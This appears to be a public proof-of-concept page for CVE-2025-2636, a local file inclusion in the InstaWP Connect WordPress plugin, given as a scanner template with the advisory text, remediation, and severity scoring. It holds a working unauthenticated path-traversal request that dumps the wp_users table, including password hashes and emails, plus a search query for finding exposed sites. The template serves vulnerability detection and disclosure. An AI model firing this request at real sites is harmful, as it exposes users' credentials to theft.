The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
PoC代码[已公开]
id: CVE-2025-2636
info:
name: InstaWP Connect < 0.1.0.86 - Local PHP File Inclusion
author: iamnoooob,pdresearch
severity: high
description: |
The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
remediation: |
Update InstaWP Connect plugin to version 0.1.0.86 or later.
reference:
- https://wpscan.com/vulnerability/d1b64725-d4ae-4d73-950a-b772a877022b/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2c6f-c231-477c-895b-df892569ef95
- https://nvd.nist.gov/vuln/detail/CVE-2025-2636
classification:
epss-score: 0.09761
epss-percentile: 0.92666
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2636
cwe-id: CWE-22
metadata:
max-request: 1
verified: true
fofa-query: body="/wp-content/plugins/instawp-connect"
tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev
http:
- raw:
- |
GET /?instawp-database-manager=/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'instawp-wrap'
- 'user_pass</th>'
- 'user_email</th>'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402200268a36e36a8bba3ad302dcce73c8f4da0d8dd5003963bafd2fe4c04f517f3d902207a0eaea5f85f436ec28f4e4a225e1fada22f557f7d5b678ce86b1065a101da31:922c64590222798bb761d5b6d8e72950